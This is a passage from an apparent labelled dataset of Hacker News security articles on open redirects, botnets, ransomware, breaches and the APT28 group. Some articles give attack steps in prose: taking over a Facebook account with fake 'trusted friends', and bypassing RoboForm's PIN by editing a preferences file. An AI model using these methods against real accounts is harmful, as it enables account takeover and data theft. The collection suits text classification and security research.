An open redirect is a vulnerability that exists when a script allows redirectionto an external site by directly calling a specific URL in an unfiltered,unmanaged fashion, which could be used to redirect victims to unintended,malicious web sites. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
A similar vulnerability is reported in Google by ""Ucha Gobejishvili ( longrifle0x )"". This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.
Url: https://accounts.google.com/o/oauth2/auth?redirect_uri=https://www.something.com
Same vulnerability in Facebook, Discovered by ZeRtOx from Devitel group:
https://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.something.com
Impact of Vulnerability :
The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.
The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.
",Malware
"Facebook ""Trusted friends"" Security Feature Easily Exploitable",https://thehackernews.com/2011/10/facebook-trusted-friends-security.html,"Facebook ""Trusted friends"" Security Feature Easily Exploitable
Last week Facebook announced that in one day 600,000 accounts possibly get hacked. Another possible solution for Facebook to combat security issues is to find 3 to 5 ""Trusted friends"". Facebook will be adding two new security features that will allow users to regain control of their account if it gets hijacked.
In Facebook's case, the keys are codes, and the user can choose from three to five ""Trusted friends"" who are then provided with a code. If you ever get locked out of your account (and you can't access your email to follow the link after resetting your Facebook password), you gather all the codes and use them to gain access to it again. Yet This method is used by hackers to hack most of the Facebook account using little bit of Social Engineering from last 5-6 Months according to me. Let us know, how this works...
How its Exploitable:
This Exploit is 90% Successful on the victims who add friends without knowing them or just for increasing the number of Friends. This method to hack a Facebook Account only works if 3 trusted friends agree to give you the security code ! Another Idea, Why not Create 3 fake accounts and send Friend Request to Victim. Once your 3 Fake Accounts become friends with your victims facebook account, you can select those 3 Accounts to get the Security Code and Reset the password of Victim. Here a Complete Demonstration of Hacking Method on HackersOnlineClub.
Other Serious Facebook Vulnerability in Last Week
Last Week Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach EXE files in messages,cause possible User Credentials to be Compromised . Not even Account Security, Also there are lots of Privacy Issues in Facebook,like Nelson Novaes Neto, a Brazilian (independent) Security and Behavior Research have analyze a privacy issue in Facebook Ticker that allows any person chasing you without your knowledge or consent . Facebook should takes these privacy issues & security holes very seriously.
",Vulnerability
Aldi Bot - Buy a Botnet just in 10 Euros,https://thehackernews.com/2011/09/aldi-bot-buy-botnet-just-in-10-euros.html,"Aldi Bot - Buy a Botnet just in 10 Euros
Researchers of German security firm G Data have discovered that a bot builder dubbed ""Aldi Bot"" is currently being offered for that much on underground forums. The Aldi Bot Builder appears to be based on the ZeuS source code. The malware has nothing to do with the discount supermarket chain and it is not clear why its author chose to name the bot after Aldi – it is thought it may relate to the bot's discount pricing.
Company says ""We've encountered a bot sale, which, in case it finds followers, can cause a massive glut of malware all over. The so-called ""Aldi Bot"" first appeared in late August and has been sold for the initial price of €10! Parts of the bot's code oddly look like ZeuS code…""
The Aldi Bot can read (saved) passwords from the Firefox web browser, Pidgin IM client and JDownloader download tool, and send them to a command and control server which is included in the €10 price tag. The Aldi Bot can also carry out Distributed Denial-of-Service (DDoS) attacks, as the bot's author demonstrates with a YouTube video showing an attack on the German Bundeskriminalamt (equivalent to the UK CID) web site. The bot can also be set up as a SOCKS proxy to use infected computers as proxies for protocols of the bot herder's choosing. Infecting systems with the discount malware does, however, require additional measures, such as exploit packs on infected web sites.
",Malware
Ransomware Attack Takes Down Bristol Airport's Flight Display Screens,https://thehackernews.com/2018/09/cyberattack-bristol-airport.html,"Bristol Airport has blamed a ransomware attack for causing a blackout of flight information screens for two days over the weekend.
The airport said that the attack started Friday morning, taking out several computers over the airport network, including its in-house display screens which provide details about the arrival and departure information of flights.
The attack forced the airport officials to take down its systems and use whiteboards and paper posters to announce check-in and arrival information for flights going through the airport and luggage pickup points for all Friday, Saturday, and the subsequent night.
""We are currently experiencing technical problems with our flight information screens,"" a post on the Bristol Airport's official Twitter feed read on Friday.
""Flights are unaffected and details of check-in desks, boarding gates, and arrival/departure times will be made over the public address system. Additional staff are on hand to assist passengers.""
The airport also urged passengers to arrive early and ""allow extra time for check-in and boarding processes,"" though this two days technical meltdown caused delays in baggage handling, with customers needed to wait longer than one hour for their bags.
However, no flight delays were reportedly caused due to the cyber attack.
An airport spokesman said that the information screens went offline due to a so-called ""ransomware"" attack, though he confirmed that no ""ransom"" had been paid to get the airport systems working again.
Affected systems and flight information screens were finally restored on Sunday, officials said.
""We are grateful to passengers for their patience while we have been working to resolve issues with flight information this weekend. Digital screens are now live in arrivals and departures. Work will continue to restore complete site-wide coverage as soon as possible,"" the airport tweeted on Sunday.
At the moment, it is not clear how the ransomware got into the airport systems. Bristol is carrying out an investigation to find out what happened.
",Cyber_Attack
Server Misconfiguration discloses passwords of all Barracuda Network Employees,https://thehackernews.com/2013/07/Barracuda-network-Password-disclosure-vulnerability_24.html,"Security expert Ebrahim Hegazy has found a Password disclosure vulnerability in Barracuda update servers which allows to gain access to employee credentials.
The Egyptian information security advisor Ebrahim Hegazy(@Zigoo0) has found a Password disclosure vulnerability in one of Barracuda update servers which allows the attackers to gain access to all its employee data.
When the system administrator needs to protect a directory with a second authentication layer (basic authentication) besides the back-end authentication, he can do it with multiple methods, one of that methods is through the configuration of .htaccess and .htpasswd files. A proper configuration could prevent a visitor to surf reserved area (e.g /Cpanel or /admin), in this scenario a popup proposes to the user asking to enter authentication credentials, that credentials are saved inside .htpasswd file as:
Username:Password
In normal scenarios the .htpasswd file should be stored outside the web directory (e.g. C:\AnyName\.htpasswd)
But in Barracuda issue the file was stored inside the admin panel directory and was accessible by anyone with serious repercussion.
If the user directly accesses the following link https://updates.cudasvc.com/admin/.htpasswd ,he will be able to disclose the passwords of all Barracuda Network Employees such as: Support, Sales, UK Branch employees, Update server users, Engineers and more of those who have access to the basic authentication layer!
The Password disclosure vulnerability is exacerbated by the fact that the passwords were saved as a clear text, following the screenshots before the vulnerability got patched
The vulnerability has been reported by Ebrahim Hegazy to Barracuda, that already fixed it, despite it is not eligible for the bounty. Curious that Barracuda considered ""Password disclosure vulnerability"" out of scope vulnerability, IMHO I consider it a critical flaw.
Ebrahim Hegazy has found and reported the vulnerability to Barracuda as a participant in the Barracuda bug bounty program.
I consider Ebrahim Hegazy a very skilled professional that is doing an excellent job in security field, let's remind that in the last months he already discovered flaws in DropBox, Avira web site and Yahoo! ... What is the next?
What will happen if these smart guys will start to sell the knowledge of vulnerabilities in the underground?
",Vulnerability
APT28 — State Sponsored Russian Hacker Group,https://thehackernews.com/2014/10/APT28-Russian-hacker-cyber-espionage.html,"Nearly a decade-long cyber espionage group that targeted a variety of Eastern European governments and security-related organizations including the North Atlantic Treaty Organization (NATO) has been exposed by a security research firm.
The US intelligence firm FireEye released its latest Advanced Persistent Threat (APT) report on Tuesday which said that the cyber attacks targeting various organisations would be of the interest to Russia, and ""may be"" sponsored by the Russian government.
The Report entitled ""APT28: A Window Into Russia's Cyber Espionage Operations"" published by FireEye has ""evidence of long-standing, focused operations that indicate a government sponsor - specifically, a government based in Moscow.""
""Despite rumours of the Russian government's alleged involvement in high-profile government and military cyber attacks, there has been little hard evidence of any link to cyber espionage,"" Dan McWhorter, FireEye vice president of Threat Intelligence, wrote in a blog post discussing the report.
""FireEye's latest APT report sheds light on cyber espionage operations that we assess to be most likely to be sponsored by the Russian government, long believed to be a leader among major nations in performing sophisticated network attacks.""
The cyber-espionage group believed to have been operating since at least 2007 in order to steal political and state secrets from businesses and foreign governments. The group launched a cyber attack on government in Georgia, Eastern Europe, as well as NATO and the Organisation for Security and Co-operation in Europe, according to the report.
Whereas the Russian cyber criminal groups are known for conducting massive cyber campaigns aimed at stealing money and financial information, but APT28 focuses on ""privileged information related to governments, militaries and security organizations.""
""This group, unlike the China-based threat actors we track, does not appear to conduct widespread intellectual property theft for economic gain,"" FireEye stated in the report. ""Nor have we observed the group steal and profit from financial account information.""
The security firm analyzed that the malware used by APT28 features a consistent use of the Russian language. Moreover, more than 96 percent of malware samples analyzed by the researchers were compiled between Monday and Friday, between 8AM and 6PM in the time zone paralleling working hours in Moscow and St. Petersburg. This regularity in the work suggests that the hackers were in Moscow, the report argues.
The APT28 group has constantly updated their software and made the resulting binaries difficult to reverse engineer. It used a downloader tool that FireEye dubbed ""SOURFACE"", a backdoor labelled ""EVILTOSS"" that gives hackers remote access and a flexible modular implant called ""CHOPSTICK"" to enhance functionality of the espionage software.
Infection is usually achieved via a spear phishing email with a relevant lure and the malware hidden in the attachment. The hacker group has also created a number of fake domains for UK-based defence events, including the Counter Terror Expo, as part of the operation to gather intelligence on attendees.
Together with the help of above mentioned tools, the group gained access to the file system and registry; enumerate network resources; create processes; log keystrokes; access stored credentials; execute shellcode, and encrypt exfiltrated data uploaded with an RSA public key.
""The coding practices evident in the group's malware suggest both a high level of skill and an interest in complicating reverse engineering efforts,"" the report stated.
In another report , a top White House official has confirmed that Russian hackers have hacked into the unclassified White House computer networks. ""we identified activity of concern on the unclassified Executive Office of the President network,"".
Russia has been suspected of attacks on Ukraine too, including attempts to gain access to politicians' mobile phone communications.
",Malware
Drupal resets 1 Million Passwords after Data Breach,https://thehackernews.com/2013/05/drupal-resets-1-million-passwords-after.html,"A Drupal data breach was announced by the official Drupal Association, that Passwords for almost one million accounts on the Drupal.org website are being reset after hackers gained unauthorized access to sensitive user data.
The security of the open source content management system has been compromised via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. As countermeasure it is resetting the passwords for nearly one million accounts in the wake of a data breach.
Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. The Drupal.org hasn't revealed the name of the third-party application exploited during the attack.
Evidence of the Drupal data breach was found during a routine security audit:
""Upon discovering the files during a security audit, we shut down the association.drupal.org website to mitigate any possible ongoing security issues related to the files,"" ""The Drupal security team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability.""
""The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org.
This access was accomplished via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.""
The Drupal data breach is considerably really serious about user's security, an impressive amount of web sites is based on the popular content management. The thousands of websites that run on Drupal software estimated at 2 percent of all sites should not be affected by the data breach.
The Drupal.org Security Team confirmed the ""unauthorized access"" to their system, highlighting that there's no evidence that any information was actually stolen. As a precautionary measure was requested all users to reset their passwords at their next login attempt.
Holly Ross, Executive Director for Drupal Association confirmed that they are investigating on the incident that could have exposed also other info: ""We are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly""
The attacks to Open Source CMS solutions are not an isolated cases due their large diffusion, in the past Joomla and WordPress platforms were hit and used to spread malicious code, WordPress recently was hit by a massive ""brute-force"" attack by botnet composed by almost 100,000 bots.
It's easy to predict that this kind of attacks is likely to increase for the large-diffusion of these platforms which makes them privileged targets.
Drupal.org account holders will be required to change their password by entering their username or e-mail address, and following the link included in the e-mail message that follows.
",Vulnerability
2-Year-Old Linux Kernel Issue Resurfaces As High-Risk Flaw,https://thehackernews.com/2017/09/linux-kernel-hacking.html,"A bug in Linux kernel that was discovered two years ago, but was not considered a security threat at that time, has now been recognised as a potential local privilege escalation flaw.
Identified as CVE-2017-1000253, the bug was initially discovered by Google researcher Michael Davidson in April 2015.
Since it was not recognised as a serious bug at that time, the patch for this kernel flaw was not backported to long-term Linux distributions in kernel 3.10.77.
However, researchers at Qualys Research Labs has now found that this vulnerability could be exploited to escalate privileges and it affects all major Linux distributions, including Red Hat, Debian, and CentOS.
The vulnerability left ""all versions of CentOS 7 before 1708 (released on September 13, 2017), all versions of Red Hat Enterprise Linux 7 before 7.4 (released on August 1, 2017), and all versions of CentOS 6 and Red Hat Enterprise Linux 6 are exploitable,"" Qualys said in an advisory published yesterday.
The vulnerability, which has been given a CVSS3 Base Score of 7.8 out of 10, resides in the way Linux kernel loads ELF executables, which potentially results in memory corruption.
Researchers find that an unprivileged local user with access to SUID (or otherwise privileged) Position Independent Executable (PIE) binary could use this vulnerability to escalate their privileges on the affected system.
In order to mitigate this issue, users can switch to the legacy mmap layout by setting vm.legacy_va_layout to 1, which will effectively disable the exploitation of this security flaw.
Since the mmap allocations start much lower in the process address space and follow the bottom-up allocation model, ""the initial PIE executable mapping is far from the reserved stack area and cannot interfere with the stack.""
Qualys says this flaw is not limited to the PIEs whose read-write segment is larger than 128MB, which is the minimum distance between the mmap_base and the highest address of the stack, not the lowest address of the stack.
So, when passing 1.5GB of argument strings to execve(), any PIE can be mapped directly below the stack and trigger the vulnerability.
Linux distributions, including Red Hat, Debian, and CentOS, have released security updates to address the vulnerability.
The Qualys team has promised to publish a proof-of-concept soon exploit that works on CentOS-7 kernel versions ""3.10.0-514.21.2.el7.x86_64"" and ""3.10.0-514.26.1.el7.x86_64,"" once a maximum number of users have had time to patch their systems against the flaw.
Stay Tuned!
",Vulnerability
Oracle Database new zero day exploit put users at risk,https://thehackernews.com/2012/05/oracle-database-new-zero-day-exploit.html,"Oracle Database new zero day exploit put users at risk
Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April critical patch update. Oracle issued a security alert for Oracle TNS Poison, the vulnerability, disclosed by researcher Joxean Koret after he mistakenly thought it had been fixed by Oracle, allows an attacker to hijack the information exchanged between clients and databases.
Koret originally reported the vulnerability to Oracle in 2008, four years ago! and said he was surprised to see it had been fixed in Oracle's most recent Critical Patch Update without any acknowledgment of his work.
""This vulnerability is remotely exploitable without authentication, and if successfully exploited, can result in a full compromise of the targeted Database,"" the company warned.
""This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener which has been recently disclosed as 'TNS Listener Poison Attack' affecting the Oracle Database Server. This vulnerability may be remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality, integrity and availability of systems that do not have recommended solution applied"", Oracle wrote.
A TNS Listener feature known as remote registration dates back to at least 1999 with version 8i of the Oracle Database. By sending a simple query to the service, an attacker can hijack connections legitimate users have already established with the database without the need of a password or other authentication. From then on, data traveling between legitimate users and the server pass through the connection set up by the attacker.
Oracle released a critical update for versions 10g and 11g database products fixing this vulnerability.
",Vulnerability
9 million PCs infected with ZeroAccess botnet,https://thehackernews.com/2012/09/9-million-pcs-infected-with-zeroaccess.html,"In recent months, we've seen the rootkit family Win32/Sirefef and Win64/Sirefef (also known as ZeroAccess Botnet) update its command and control protocol and grow to infect more computers while connecting to over one million computers globally.
Before, disclosed that it creates its own hidden partition on the hard drive and uses hidden alternative data streams to hide and thrive. Then ZeroAccess developer changed infection tactics and stopped using kernel-mode components in the latest version Security firms tracked the growth of x64 version infections. But Recently uncovered by SophosLabs that ZeroAccess botnet took a major shift in strategy and operating entirely in user-mode memory.
There are two distinct ZeroAccess botnets, and each has a 32-bit version and a 64-bit version, numbering four botnets in total. Each botnet is self-contained because it communicates exclusively on a particular port number hard-coded into the bot executable. The botnets can be categorised based on their port numbers. Ports 16464 and 16465 are used by the 32-bit and 64-bit versions of one botnet; ports 16470 and 16471 are used by the 64-bit and 32-bit versions of the other botnet.
They also disclose the ZeroAccess has been installed on computers over nine million times with the current number of active infected PCs numbering around one million.
The current size of the botnet is somewhere in the region of 9 million machines spread throughout the world, but with the majority located in the U.S.
Other than U.S other top infected countries are :
Brazil
Japan
Romania
Argentina
Venezuela
Chile
The ZeroAccess botnet currently creates two primary revenue streams: click fraud and Bitcoin mining. Click fraud and Bitcoin mining can earn the botnet owners a potential $100,000 a day. ""The traffic generated by the ad-click fraud can burn through your bandwidth cap. We have been following a number of bots such as ZeroAccess whose primary function is ad-click fraud. These bots receive instructions from a controller directing them to click on ads on specific web sites. The web site owner gets paid by the advertiser on a per click basis usually through the intermediary of an ad network. The advertisers and ad network operator have a number of safeguards in place to protect against click fraud,"" the report said.
The ZeroAccess botnet not only makes large amounts of money for its owners but it also causes significant damage and loss in a variety of ways to a variety of individuals and entities. Various aspects of ZeroAccess' operation consume considerable bandwidth. This is 1,227,300 bytes per hour, 29,455,200 per day and 895,929,000 bytes per month. 895 MB per month per bot means a botnet with 1 million nodes could be producing as much as 895,000,000 MB or 895 Terabytes of network traffic per month. And all of this occurs before any files are actually downloaded using the protocol.
The peer-to-peer protocol used by the latest version of ZeroAccess contains only a few commands and is designed to spread files and IP addresses across the network quickly. It is encrypted to avoid easy detection and there are a number of measures taken to avoid the network being poisoned or taken over. This generally held at around 150,000 new installations per day, with a noticeable drop at the end of August.
",Malware
Top 4 Data Breaches reported in last 24 Hours,https://thehackernews.com/2016/05/top-data-breach.html,"There is no doubt that data breaches are on the rise. Hardly a day goes without headlines about any significant data breach.
According to the latest 'Cyber Security Breaches Survey 2016' report published by UK government, two-thirds of the biggest firm in the UK have experienced at least a cyber attacks or data breaches within the past 12 months.
Here's today, I am writing about top 4 data breaches reported in last 24 hours, threatened your data privacy and online security.
1. Kiddicare Hacked! 794,000 Accounts Leaked
Kiddicare has admitted that the company has suffered a data breach, which led to the theft of sensitive data belonging to 794,000 users, including phone numbers and residential addresses.
Kiddicare, company that sells child toys and accessories across the United Kingdom, became aware of the data breach after its customers started receiving suspicious text messages – most likely part of a phishing campaign – that attempted to pilfer them to click on a link that takes them for an online survey.
Although the company assured its customers that no banking or financial detail have been compromised in the breach, personal information belonging to nearly 794,000 customers, including their names, delivery addresses, email addresses and telephone numbers, have been exposed.
2. UserVoice Hacked! Users' Accounts Breached
Today morning, I received an email from UserVoice, a web-based service that offers customer service and helpdesk tools, notifying that the company suffered a data breach and some user accounts were compromised, including their names, email addresses, and passwords.
The company admitted that user passwords were protected with the SHA1 hashing algorithm, which is considered as a weak encryption.
""Despite the fact that the passwords were encrypted, it is very possible that an attacker can decrypt this information,"" the company notified. ""As a precautionary measure, we have reset all UserVoice passwords to prevent any chance of the attacker gaining further access to accounts.""
Some famous companies are using customer service tools from UserVoice, including Twitch, Microsoft and more.
3. Google Suffers Insider Data Breach
Google suffered a minor data breach after a vendor unintentionally leaked sensitive information about its undisclosed number of employees to the wrong email address — but luckily, the person who received it deleted the email straight away.
According to report, the data breach happened after an employee at a third-party company that Google uses for its staff benefit management service mistakenly sent personal data to another company.
Google is still investigating the insider data breach that leaked the personal details of Google employees apparently included Social Security Numbers (SSNs) and names, but no details on benefits or family members.
4. London Clinic fined £180,000 for Leaking HIV Patients Data
The Information Commissioner's Office (ICO) has imposed a £180,000 (about $260,000) fine to a London-based HIV clinic run by Chelsea and Westminster Hospital National Health Service (NHS) Foundation Trust, for leaking data of 781 HIV patients
The clinic mistakenly sent a newsletter email containing sensitive medical information relating to a total 781 HIV patients together rather than individually, using 'bcc' field in the email, leaking their names and email addresses to one another.
""People's use of a specialist service at a sexual health clinic is clearly sensitive personal data,"" Information Commissioner Christopher Graham said. ""The law demands this type of information is handled with particular care following clear rules, and put simply, this did not happen.""
The Clinic's medical director said:
""We fully accept the ruling of the ICO for what was a serious breach, and we have worked to ensure that it can never happen again.""
",Data_Breaches
New Apple vulnerability allows Malicious keylogger App to Record User Inputs,https://thehackernews.com/2014/02/new-apple-vulnerability-allows.html,"Yet another Apple vulnerability has been exposed by security researchers, that can be exploited to track your finger's every action on iOS Devices i.e. iPhone, iPad etc.
The exploit reportedly targets a flaw in iOS multitasking capabilities to capture user inputs, according to Security researchers at FireEye.
They found a way to bypass the Apple's app review process effectively and created a proof-of-concept Monitoring app for non-jailbroken iOS 7.0.x devices.
The ""monitoring"" app, that runs in the background of the iPhone is a Keylogger Trojan which could allow hackers to monitor user's activities on the mobile device, including - touches on the screen, home button press, volume button press and TouchID press, and send all collected events to any remote server.
According to researchers, their proof-of-concept app works on versions 7.0.4, 7.0.5, 7.0.6, and 6.1.x.
""Based on the findings, potential attackers can either use phishing to mislead the victim to install a malicious/vulnerable app or exploit another remote vulnerability of some app, and then conduct background monitoring."" FireEye researchers said.
In iOS devices, the application running in the background keeps on refreshing itself; but the researchers also noted that disabling iOS 7's ""Background App Refresh"" setting would not restrict a malicious app from keylogging.
""For example, an app can play music in the background without turning on its ""background app refresh"" switch. Thus a malicious app can disguise itself as a music app to conduct background monitoring."" FireEye explained, So the only present solution to the problem is to manually remove apps from the task switcher.
Earlier this week, Apple has issued an urgent update iOS 7.0.6 in response to a SSL vulnerability that might allow hackers to bypass SSL/TLS verifications on shared and public networks and steal users information from affected devices, including log-in usernames and passwords, as well as other sensitive information.
The Security firm is actively working with Apple on the issue, but until the release of next iOS update, the only thing iOS users can do - Check and monitor the unnecessary applications running on the device via Task Manager and KILL THEM.
Last month, Trustwave's Neal Hindocha also demonstrated that even Smartphone screen swipe gestures can be analyzed by hackers and as a proof-of-concept he developed a prototype 'Screenlogging' malware for the iOS and Android Smartphones that works the same as a keylogger software for desktop.
",Vulnerability
"Adobe Releases Critical Security Updates for Flash Player, Acrobat and Adobe Reader",https://thehackernews.com/2014/08/adobe-security-update.html,"Adobe has released security updates to fix seven vulnerabilities in its Flash and Air platforms and one in its Reader and Acrobat which, according to the company, is being exploited by attackers in wild ""...in limited, isolated attacks targeting Adobe Reader users on Windows.""
The vulnerabilities could allow an attacker to ""take control of affected systems"" marked critical by the company.
A new, out-of-band patch addresses a zero-day vulnerability (CVE-2014-0546) in Adobe Reader and Acrobat that offers an attacker the possibility to bypass sandbox protection and has been leveraged in ""limited, isolated attacks"" against Windows users.
""These updates resolve a sandbox bypass vulnerability that could be exploited to run native code with escalated privileges on Windows,"" Adobe warned.
The lone vulnerability in Adobe Acrobat and Reader was reported by Kaspersky Lab Global Research and Analysis Team director Costin Raiu and Vitaly Kamluk.
However, details of the vulnerability were not disclosed, but Raiu said in a blog post that exploits have been observed in a rare number of targeted attacks, and that it's still important for everyone to patch as soon as possible.
""At the moment, we are not providing any details on these attacks as the investigation is still ongoing,"" Raiu said. ""Although these attacks are very rare, just to stay on the safe side we recommend everyone to get the update from the Adobe site as soon as possible.""
The Apple OS X versions of Acrobat and Reader are not vulnerable. Only Reader and Acrobat versions 11.0.07 and earlier for Windows are affected, according to the company.
The other security update patches seven vulnerabilities in Flash Player, most of which are rated critical by the company, but none of the Flash vulnerabilities are being exploited in the wild, Adobe said.
Five of the updates resolved memory leakage vulnerabilities that can be used to bypass memory address randomization. Rest two patches address a security bypass vulnerability and a use-after-free flaw that could allow an attacker to remotely execute code on the affected system.
The affected versions are as follow:
Adobe Flash Player 14.0.0.145 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.394 and earlier versions for Linux
Adobe AIR 14.0.0.110 and earlier versions for Windows and Macintosh
Adobe AIR 14.0.0.137 SDK and earlier versions
Adobe AIR 14.0.0.137 SDK & Compiler and earlier versions
Adobe AIR 14.0.0.137 and earlier versions for Android
The company urged its users to apply the updates within three days on Windows, Mac, and Linux platforms. Users may update Acrobat and Reader with the Help > Check for Updates menu option. Flash Player users may download the latest version from Adobe. Users of Internet Explorer and Google Chrome on Windows 8 and above will receive browser updates from those companies with fixed versions of their integrated Flash Player.
Microsoft has also rolled out nine security updates to address at least 37 security holes in Windows and related software, including Internet Explorer, Windows Media Center, One Note, SQL Server, and SharePoint.
The company has also made some important changes this month. Microsoft announced that it will soon begin blocking out-of-date ActiveX controls for Internet Explorer users, and will support only the latest versions of the .NET Framework and IE for each supported operating system.
",Vulnerability
Dumb Ransomware Developer leaves Decryption Keys on Infected Computers,https://thehackernews.com/2014/04/dumb-ransomware-developer-leaves.html,"So, How do Hackers compromise a Website? Simply by exploiting the flaws in it, that means they took advantage of the error in the developers' code. Now, this time the hackers itself has left behind a crucial flaw in its malware code which can be exploited by us to help save our computer systems.
Believe me, it's not an April Fools' joke! A malicious software program that holds the victims' computer files hostage by wrapping them with strong encryption until the victim pays a ransom fee to get them decrypted, has a critical flaw in its malware code itself that it leaves the decryption key on the victim's computer.
The Anti-virus firm Symantec examined a sophisticated malware program dubbed as CryptoDefense (Trojan.Cryptodefense) ransomware, which appeared in the end of the last month.
CryptoDefense is one of the complex malware programs that include a number of effective techniques, including Tor anonymity tool usage and Bitcoin digital currency to extort money from victims. CryptoDefense uses Microsoft's infrastructure and Windows API to generate the encryption and decryption keys, the antivirus firm wrote on its blog.
CryptoDefense encrypts files using public-key cryptography, a strong RSA 2048 encryption in order to ensure files are held to ransom and transmits the private key in plain text back to the attacker's server, so that as soon as the ransom amount is paid by the victim, the attacker will release the private keys to decrypt the files.
So, if once the files have been encrypted, without access to the private key, victims will not be able to decrypt the files. But here they stumbled, the CryptoDefense' developer failed to realize that the private key is also left concealed on the user's computer in a file folder with application data.
""Due to the attacker's poor implementation of the cryptographic functionality they have, quite literally, left their hostages a key to escape,"" Symantec wrote.
Despite the dumb mistake of the malware developer, it is not sure that it will left the users untouched, because some technical skills is required to figure out the decryption keys.
CryptoDefense is been sent out as spam emails, or masquerade itself as a PDF file and once installed in the system, it attempts to communicate with either of the four domains and uploads a profile of the infected machine, the firm wrote.
The Cyber Criminals demand either $500 or €500 that has to be paid within four days and if victim doesn't pay the ransom in the given time frame, the ransom doubles itself.
According to the firm, it is estimated that the cybercriminals received more than $34,000 worth of Bitcoin in just a month, which shows the effectiveness of their scam.
Symantec said it has blocked 11,000 unique CryptoDefense ransomware infections in more than 100 countries, with the majority of the infection attempts are noticed in the U.S. followed by the U.K., Canada, Australia, Japan, India, Italy and the Netherlands.
",Malware
Critical Vulnerability and Privacy LoopHole Found in RoboForm Password Manager,https://thehackernews.com/2014/07/critical-vulnerability-and-privacy.html,"Unless you are a human supercomputer, remembering password is not so easy, and that too if you have a different password for each site. But luckily to make the whole process very easy, there is a growing market out there for password managers and lockers with extra layers of security.
But, if you are using the mobile version of most popular password manager from Password management company RoboForm to manage your passwords then you might be at a risk, claimed a UK based Security researcher.
I am personally using RoboForm from last few months, which is a great password manager application developed by Siber Systems Inc. for various platforms that stores your sensitive data all in one place, protected at RoboForm account and encrypted by a secret master password. RoboForm user be able to then quickly access those passwords and notes anytime, anywhere.
But a IT security consultant and tech enthusiast Paul Moore discovered one critical vulnerability in its app and one Privacy loophole in the RoboForm's service, that could allow attackers and prying eyes to get users' personal data, including stored login credentials of various websites and payment card details.
Note: Yesterday we published this article with a conclusion that RoboForm is secure, but later after re-evaluating and discussing all factors, attack vectors with Moore, we found that RoboForm may leak your private data to attackers.
1) BYPASSING ROBOFORM DEVICE PIN PROTECTION
The vulnerability disclosed by Paul Moore in the security of RoboForm affects its Android and iOS app users, which could allow anyone to bypass RoboForm's PIN Protection in order to access users' sensitive data.
RoboForm mobile apps offer a PIN protection which only protects the app interface from unauthorized access, just like Android's popular 'AppLock' application.
Moore claimed that simply by deleting a specific line (pref_pincode) in the RoboForm's preferences file placed in a folder on the device file system, It was possible for Moore to access confidential data and bypass authentication process on an Android device, even without the requirement of the Master Password, as shown in the Video demonstration uploaded by him.
The important point to be noted here is that the RoboForm's app folder which Moore claims to access is actually placed in root directory of the device, which can't be accessed by the user or any 3rd party app on a non-rooted device.
However, RoboForm team failed to reproduce the flaw and refused the bug report. ""We are not able to replicate it. As I mentioned in the write-up, it's done using an emulator, not a real device. While it's feasibly possible, it's very unlikely that the average person finding a phone with RoboForm installed could execute the precise steps needed to do what Mr. Moore is doing with the emulator."" RoboForm team said.
Yesterday, when I also failed to reproduce it myself on my Android device, then Moore explained me that even after modification, the Roboform app loads the preference file from its cache. So either Roboform app or device requires to restart in order to bypass the PIN protection.
Finally, I tried again. After restarting my Samsung Galaxy S4, I found that Roboform app opened without asking any PIN. Cool! Moore's vulnerability works.
The vulnerability is serious, because the Roboform app stores all my passwords, secret notes and payment card details in it, and PIN bypass cloud allow anyone in 5 minutes with my phone to steal all my sensitive data.
""Additionally, our position is that if someone is able to root a phone, it's not just RoboForm that is vulnerable. Any other sensitive app would be vulnerable."" RoboForm team added.
For successful exploitation, the targeted device should be rooted or jailbroken, but it can be easily done by attackers on the stolen devices.
2.) PRIVACY LOOPHOLE: MASTER PASSWORD SECRECY
Moore believes that the company as a privacy loophole, allows them to store users' secret master password on their server at Siber Systems. But before proceeding to the details of this loophole, you should first learn - How Roboform works.
After installing the Roboform app on Android or Windows system, it will ask you to either register or login with a RoboForm account. Once logged-in, you will get options to create or edit the payment card details, Notes and account passwords, etc.
The Mobile app or desktop software will then prompt the user to set a ""Master Password"" in order to encrypt the data with a strong military grade encryption. Company claims that the Master Password works like a private crypto key, used to encrypts files locally on the device and then app upload them to their server in .RFN format.
Moore claims that company stores the Master password, and asked on Twitter, ""How do you decrypt online before returning the data if you don't get the key?"", In Reply RoboForm said, ""Paul, we decrypt the data locally, not on the servers.""
Once done, the master password will get stored only on the device to automate the future encryptions and decryptions for the users' convenience.
ROBOFORM WEB APP CAN STORE YOUR MASTER PASSWORD
Until here, Moore and me agree that the company is not capturing our private master password on the device apps or windows apps, but Roboform Everywhere also has online web app at https://online.roboform.com/login?lang=en location.
Using this web app hosted on Siber System servers, users can login to their Roboform account and access the stored data from the web browser, as shown:
But before accessing the encrypted data, users are required to enter their master password in order to decrypt it, that means users are sending their master keys to Siber System servers and company is decrypting the data on their servers.
The above mechanism is completely opposite and conflicts with the company's policies, which claims that they do not store users' master key on their servers, instead they decrypt the data locally on the users' device.
""The Server has the necessary key required to decrypt the data. Breaking the key into segments does nothing to increase security. Ultimately, it doesn't change the fact that at some point, the private key is no longer private."" Moore justified his claim.
